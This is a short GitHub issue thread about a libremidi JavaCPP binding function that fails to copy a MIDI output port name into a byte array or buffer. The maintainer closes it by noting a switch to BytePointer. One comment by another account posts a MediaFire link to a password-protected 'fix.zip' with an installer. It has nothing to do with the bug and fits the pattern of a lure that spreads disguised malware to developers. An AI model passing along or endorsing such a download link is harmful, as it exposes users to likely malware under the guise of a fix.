### ISSUE TITLE
library.libremidi_midi_out_port_name() fails to copy name buffer into either ByteArray or ByteBuffer

### ISSUE THREAD

**Issue by atsushieno** [atsushieno/libremidi-javacpp#1]
TBD https://github.com/atsushieno/ktmidi/blob/6e76fb4a5c84cc33f2230ddb9d5d537dc2d3a67a/ktmidi-jvm-desktop/src/jvmMain/kotlin/dev/atsushieno/ktmidi/LibreMidiAccess.kt#L138

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by atsushieno** [comment]
We use `BytePointer` now.
